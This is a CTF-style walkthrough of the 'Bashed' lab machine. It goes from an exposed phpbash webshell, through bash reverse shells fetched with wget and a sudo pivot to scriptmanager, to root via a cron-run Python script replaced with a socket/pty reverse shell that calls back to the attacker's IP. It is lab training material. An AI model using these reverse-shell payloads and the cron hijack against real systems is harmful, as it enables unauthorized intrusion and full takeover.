# Bashed
> #  10.10.10.68

nmap
>PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

There's only a [website](http://10.10.10.68/single.html#) on the port 80 and he's talking about a phpbash shell 
![[bashed2.png]]
![[bashed1.png]]

The web enumeration throw a folder called dev, we know the shell is in the "development" section and the screenshots/github folder tell us how it's called "phpbash.php" so:
http://10.10.10.68/dev/phpbash.php
And we have a free webshell directly on our browser.
![[bashed3.png]]
this shell is enough for the user.txt
![[bashed4.png]]

Let's try to get a more decent shell and start looking for root.
The classic revshell payload doesn't work cause the php sanitization as you can see in the github folder - https://github.com/Arrexel/phpbash - linked in the first web page

```php
if (ISSET($_POST['cmd'])) {
	$output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1"));
	foreach ($output as $line) {
	echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>";
}
die();
}
else if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) 
{
	$filename = $_FILES["file"]["name"];
	$path = $_POST['path'];
	if ($path != "/") {
		$path .= "/";
	}

if (move_uploaded_file($_FILES["file"]["tmp_name"], $path.$filename)) {
	echo htmlentities($filename) . " successfully uploaded to " . htmlentities($path);
} 
else 
{
	echo "Error uploading " . htmlentities($filename);
}
die();
}?>
```


The github folder suggest us to upload file, could be a way to bypass those control in the php code 
![[bashed5.png]]

Just echo a reverse shell into a .sh file
```bash
echo "bash -i >& /dev/tcp/10.10.14.16/42069 0>&1" > shell.sh
```
Fire up a python server
``` bash
sudo python3 -m http.server 81
```
Start a listener on the right port
```bash
nc -nvlp 42069
```
Ask with a wget request on the webshell
```bash
wget 10.10.14.16/shell.sh -O shell.sh
```
![[bashed6.png]]
You'll be able to download your revshell in a second avoiding the control of the php code and once downloaded on the target machine trigger it with 
```bash
bash shell.sh
```
Receiving a connection on your listener 
![[bashed7.png]]

First thing first let's see what we can do as sudo user:

* We can run command as scriptmanager without password
 ![[bashed9.png]]

So let's fire up another listener (on a different port) and run another revshell (on the new port) as scriptmanager:
```bash
#attacker:
nc -nvlp 42068

#taget:
echo "bash -i >& /dev/tcp/10.10.14.16/42068 0>&1" > shell2.sh
#start a decent tty shell for sudo commands
python -c 'import pty; pty.spawn("/bin/bash");'
#run a command as different user
sudo -u scriptmanager bash shell2.sh
```
And here we are, revshell as scriptmanager.
![[bashed10.png]]
and now we're scriptmanager.

The basic enumeration immediately show us a suspect folder in the / directory: "/scripts"
where only root and scriptmanager can access.

There are a test.py and test.txt file, the .py is scriptmanager owned and the .txt file is root owned.
![[bashed12.png]]
The content of the .py file is the following:
```py
file = open(“test.txt”,”w”) 
file.write(“test123!”)
file.close()
```
.txt
```bash
test123!
```

\
Now we know that we can write on the .py file and due to the fact that the .txt is root owned we know that our .py is ran with root privilege, probably a cronjob that every now and then run that script.

The next steps are quiet obvious, we're going to write our python script for starting a revshell and when the cronjob will be executed the root user will fire it up with that .py script giving us a connection with his privilege.

Write your own .py and upload it(way easier than echo every line in a .py file, nano is not present), new listener and wait for the connection

```py
import os
import sys
import socket
import pty
s=socket.socket()
s.connect(('10.10.14.16',42070))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")

#debug purpose
os.system("echo done > done.txt")

```

Wait a couple of seconds and here we go
![[bashed13.png]]
The reverse connection triggered from the root user.

And as proof of the cronjob once root we can list which one are programmed from root with 
```bash
crontab -l
```
![[bashed11.png]]
As you can see every x a process enter the /scripts directory and run every .py file as root and for this lack of controls we've been able to gain the full access to the machine.

#machine